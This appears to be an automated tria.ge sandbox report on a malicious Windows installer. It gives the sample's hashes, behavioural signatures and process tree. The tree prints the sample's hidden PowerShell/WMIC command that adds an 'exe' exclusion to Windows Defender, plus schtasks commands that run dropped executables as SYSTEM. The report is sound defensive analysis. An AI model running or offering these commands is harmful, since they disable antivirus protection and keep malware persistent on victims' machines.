Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
122s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
10/04/2024, 17:00
Static task
static1
Behavioral task
behavioral1
Sample
40c661874eafefe097996635fd2f9ae1c3892da4be2a8961a000837d2d974243.exe
Resource
win10v2004-20231215-en
General
-
Target
40c661874eafefe097996635fd2f9ae1c3892da4be2a8961a000837d2d974243.exe
-
Size
6.4MB
-
MD5
c784f63128fa10418c64241ffc8d8e9e
-
SHA1
5b8d6566a98c71fc1394de3de6f15874c327ba21
-
SHA256
40c661874eafefe097996635fd2f9ae1c3892da4be2a8961a000837d2d974243
-
SHA512
61f83bcb8a942a9b7e2028127dbb715396167ced1b95319dbf64e16868f231954763b7c0f85bf9540d36eee202385c5ae46ce526e105f34981ffee728803cf4d
-
SSDEEP
98304:91OStCheY8CeaL3od2rNGNdMdSa1zJTH4DcftNHjoIOO:91OSUheY8CLodwGNOdSa7MsoIOO
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 61 1252 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation VjCJSwY.exe -
Executes dropped EXE 3 IoCs
pid Process 1856 Install.exe 1312 mkSDshA.exe 1220 VjCJSwY.exe -
Loads dropped DLL 1 IoCs
pid Process 1252 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json VjCJSwY.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json VjCJSwY.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini VjCJSwY.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 VjCJSwY.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 VjCJSwY.exe File created C:\Windows\system32\GroupPolicy\gpt.ini mkSDshA.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 VjCJSwY.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 VjCJSwY.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol mkSDshA.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData VjCJSwY.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 VjCJSwY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA VjCJSwY.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak VjCJSwY.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja VjCJSwY.exe File created C:\Program Files (x86)\CsUgOGApU\uqzmkKT.xml VjCJSwY.exe File created C:\Program Files (x86)\feaAGXZTPHSTZufvckR\RsXANyG.dll VjCJSwY.exe File created C:\Program Files (x86)\feaAGXZTPHSTZufvckR\xaJgLJV.xml VjCJSwY.exe File created C:\Program Files (x86)\YXRVthYkCAsAC\epayCDj.dll VjCJSwY.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi VjCJSwY.exe File created C:\Program Files (x86)\CsUgOGApU\VFffmv.dll VjCJSwY.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi VjCJSwY.exe File created C:\Program Files (x86)\eBaLNwdfBoAU2\GxuKWDa.xml VjCJSwY.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak VjCJSwY.exe File created C:\Program Files (x86)\eBaLNwdfBoAU2\tVDFBfmftmwvh.dll VjCJSwY.exe File created C:\Program Files (x86)\YXRVthYkCAsAC\wKITMtl.xml VjCJSwY.exe File created C:\Program Files (x86)\VQnigEewLHUn\HyvUmks.dll VjCJSwY.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\bHNJINcAmGBfsLXkXG.job schtasks.exe File created C:\Windows\Tasks\TVsECgUtwDhLZifMW.job schtasks.exe File created C:\Windows\Tasks\jHYEWeDFllXYdol.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 864 schtasks.exe 1240 schtasks.exe 1864 schtasks.exe 3192 schtasks.exe 1208 schtasks.exe 3176 schtasks.exe 4200 schtasks.exe 632 schtasks.exe 4952 schtasks.exe 4944 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix VjCJSwY.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer mkSDshA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{14f6f45c-0000-0000-0000-d01200000000}\MaxCapacity = "14116" VjCJSwY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2112 powershell.exe 2112 powershell.exe 2320 powershell.exe 2320 powershell.exe 2324 powershell.exe 2324 powershell.exe 1936 powershell.EXE 1936 powershell.EXE 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 880 powershell.exe 880 powershell.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe 1220 VjCJSwY.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2112 powershell.exe Token: SeIncreaseQuotaPrivilege 3108 WMIC.exe Token: SeSecurityPrivilege 3108 WMIC.exe Token: SeTakeOwnershipPrivilege 3108 WMIC.exe Token: SeLoadDriverPrivilege 3108 WMIC.exe Token: SeSystemProfilePrivilege 3108 WMIC.exe Token: SeSystemtimePrivilege 3108 WMIC.exe Token: SeProfSingleProcessPrivilege 3108 WMIC.exe Token: SeIncBasePriorityPrivilege 3108 WMIC.exe Token: SeCreatePagefilePrivilege 3108 WMIC.exe Token: SeBackupPrivilege 3108 WMIC.exe Token: SeRestorePrivilege 3108 WMIC.exe Token: SeShutdownPrivilege 3108 WMIC.exe Token: SeDebugPrivilege 3108 WMIC.exe Token: SeSystemEnvironmentPrivilege 3108 WMIC.exe Token: SeRemoteShutdownPrivilege 3108 WMIC.exe Token: SeUndockPrivilege 3108 WMIC.exe Token: SeManageVolumePrivilege 3108 WMIC.exe Token: 33 3108 WMIC.exe Token: 34 3108 WMIC.exe Token: 35 3108 WMIC.exe Token: 36 3108 WMIC.exe Token: SeIncreaseQuotaPrivilege 3108 WMIC.exe Token: SeSecurityPrivilege 3108 WMIC.exe Token: SeTakeOwnershipPrivilege 3108 WMIC.exe Token: SeLoadDriverPrivilege 3108 WMIC.exe Token: SeSystemProfilePrivilege 3108 WMIC.exe Token: SeSystemtimePrivilege 3108 WMIC.exe Token: SeProfSingleProcessPrivilege 3108 WMIC.exe Token: SeIncBasePriorityPrivilege 3108 WMIC.exe Token: SeCreatePagefilePrivilege 3108 WMIC.exe Token: SeBackupPrivilege 3108 WMIC.exe Token: SeRestorePrivilege 3108 WMIC.exe Token: SeShutdownPrivilege 3108 WMIC.exe Token: SeDebugPrivilege 3108 WMIC.exe Token: SeSystemEnvironmentPrivilege 3108 WMIC.exe Token: SeRemoteShutdownPrivilege 3108 WMIC.exe Token: SeUndockPrivilege 3108 WMIC.exe Token: SeManageVolumePrivilege 3108 WMIC.exe Token: 33 3108 WMIC.exe Token: 34 3108 WMIC.exe Token: 35 3108 WMIC.exe Token: 36 3108 WMIC.exe Token: SeDebugPrivilege 2320 powershell.exe Token: SeDebugPrivilege 2324 powershell.exe Token: SeDebugPrivilege 1936 powershell.EXE Token: SeDebugPrivilege 880 powershell.exe Token: SeAssignPrimaryTokenPrivilege 4216 WMIC.exe Token: SeIncreaseQuotaPrivilege 4216 WMIC.exe Token: SeSecurityPrivilege 4216 WMIC.exe Token: SeTakeOwnershipPrivilege 4216 WMIC.exe Token: SeLoadDriverPrivilege 4216 WMIC.exe Token: SeSystemtimePrivilege 4216 WMIC.exe Token: SeBackupPrivilege 4216 WMIC.exe Token: SeRestorePrivilege 4216 WMIC.exe Token: SeShutdownPrivilege 4216 WMIC.exe Token: SeSystemEnvironmentPrivilege 4216 WMIC.exe Token: SeUndockPrivilege 4216 WMIC.exe Token: SeManageVolumePrivilege 4216 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 4216 WMIC.exe Token: SeIncreaseQuotaPrivilege 4216 WMIC.exe Token: SeSecurityPrivilege 4216 WMIC.exe Token: SeTakeOwnershipPrivilege 4216 WMIC.exe Token: SeLoadDriverPrivilege 4216 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3156 wrote to memory of 1856 3156 40c661874eafefe097996635fd2f9ae1c3892da4be2a8961a000837d2d974243.exe 85 PID 3156 wrote to memory of 1856 3156 40c661874eafefe097996635fd2f9ae1c3892da4be2a8961a000837d2d974243.exe 85 PID 3156 wrote to memory of 1856 3156 40c661874eafefe097996635fd2f9ae1c3892da4be2a8961a000837d2d974243.exe 85 PID 1856 wrote to memory of 4356 1856 Install.exe 87 PID 1856 wrote to memory of 4356 1856 Install.exe 87 PID 1856 wrote to memory of 4356 1856 Install.exe 87 PID 4356 wrote to memory of 636 4356 forfiles.exe 89 PID 4356 wrote to memory of 636 4356 forfiles.exe 89 PID 4356 wrote to memory of 636 4356 forfiles.exe 89 PID 636 wrote to memory of 2112 636 cmd.exe 90 PID 636 wrote to memory of 2112 636 cmd.exe 90 PID 636 wrote to memory of 2112 636 cmd.exe 90 PID 2112 wrote to memory of 3108 2112 powershell.exe 93 PID 2112 wrote to memory of 3108 2112 powershell.exe 93 PID 2112 wrote to memory of 3108 2112 powershell.exe 93 PID 1856 wrote to memory of 864 1856 Install.exe 96 PID 1856 wrote to memory of 864 1856 Install.exe 96 PID 1856 wrote to memory of 864 1856 Install.exe 96 PID 1312 wrote to memory of 2320 1312 mkSDshA.exe 102 PID 1312 wrote to memory of 2320 1312 mkSDshA.exe 102 PID 1312 wrote to memory of 2320 1312 mkSDshA.exe 102 PID 2320 wrote to memory of 4924 2320 powershell.exe 104 PID 2320 wrote to memory of 4924 2320 powershell.exe 104 PID 2320 wrote to memory of 4924 2320 powershell.exe 104 PID 4924 wrote to memory of 3472 4924 cmd.exe 105 PID 4924 wrote to memory of 3472 4924 cmd.exe 105 PID 4924 wrote to memory of 3472 4924 cmd.exe 105 PID 2320 wrote to memory of 3996 2320 powershell.exe 106 PID 2320 wrote to memory of 3996 2320 powershell.exe 106 PID 2320 wrote to memory of 3996 2320 powershell.exe 106 PID 2320 wrote to memory of 4056 2320 powershell.exe 107 PID 2320 wrote to memory of 4056 2320 powershell.exe 107 PID 2320 wrote to memory of 4056 2320 powershell.exe 107 PID 2320 wrote to memory of 716 2320 powershell.exe 108 PID 2320 wrote to memory of 716 2320 powershell.exe 108 PID 2320 wrote to memory of 716 2320 powershell.exe 108 PID 2320 wrote to memory of 2624 2320 powershell.exe 109 PID 2320 wrote to memory of 2624 2320 powershell.exe 109 PID 2320 wrote to memory of 2624 2320 powershell.exe 109 PID 2320 wrote to memory of 2620 2320 powershell.exe 165 PID 2320 wrote to memory of 2620 2320 powershell.exe 165 PID 2320 wrote to memory of 2620 2320 powershell.exe 165 PID 2320 wrote to memory of 4220 2320 powershell.exe 111 PID 2320 wrote to memory of 4220 2320 powershell.exe 111 PID 2320 wrote to memory of 4220 2320 powershell.exe 111 PID 2320 wrote to memory of 3228 2320 powershell.exe 112 PID 2320 wrote to memory of 3228 2320 powershell.exe 112 PID 2320 wrote to memory of 3228 2320 powershell.exe 112 PID 2320 wrote to memory of 4196 2320 powershell.exe 113 PID 2320 wrote to memory of 4196 2320 powershell.exe 113 PID 2320 wrote to memory of 4196 2320 powershell.exe 113 PID 2320 wrote to memory of 3784 2320 powershell.exe 114 PID 2320 wrote to memory of 3784 2320 powershell.exe 114 PID 2320 wrote to memory of 3784 2320 powershell.exe 114 PID 2320 wrote to memory of 2796 2320 powershell.exe 115 PID 2320 wrote to memory of 2796 2320 powershell.exe 115 PID 2320 wrote to memory of 2796 2320 powershell.exe 115 PID 2320 wrote to memory of 3936 2320 powershell.exe 116 PID 2320 wrote to memory of 3936 2320 powershell.exe 116 PID 2320 wrote to memory of 3936 2320 powershell.exe 116 PID 2320 wrote to memory of 1204 2320 powershell.exe 117 PID 2320 wrote to memory of 1204 2320 powershell.exe 117 PID 2320 wrote to memory of 1204 2320 powershell.exe 117 PID 2320 wrote to memory of 4876 2320 powershell.exe 118
Processes
-
C:\Users\Admin\AppData\Local\Temp\40c661874eafefe097996635fd2f9ae1c3892da4be2a8961a000837d2d974243.exe"C:\Users\Admin\AppData\Local\Temp\40c661874eafefe097996635fd2f9ae1c3892da4be2a8961a000837d2d974243.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Users\Admin\AppData\Local\Temp\7zS466F.tmp\Install.exe.\Install.exe /bCUydidahlzr "385118" /S2⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3108
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bHNJINcAmGBfsLXkXG" /SC once /ST 17:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\seTWBfhrtkxFtxG\mkSDshA.exe\" kg /Sfsite_idTkJ 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:864
-
-
-
C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\seTWBfhrtkxFtxG\mkSDshA.exeC:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\seTWBfhrtkxFtxG\mkSDshA.exe kg /Sfsite_idTkJ 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1312 -
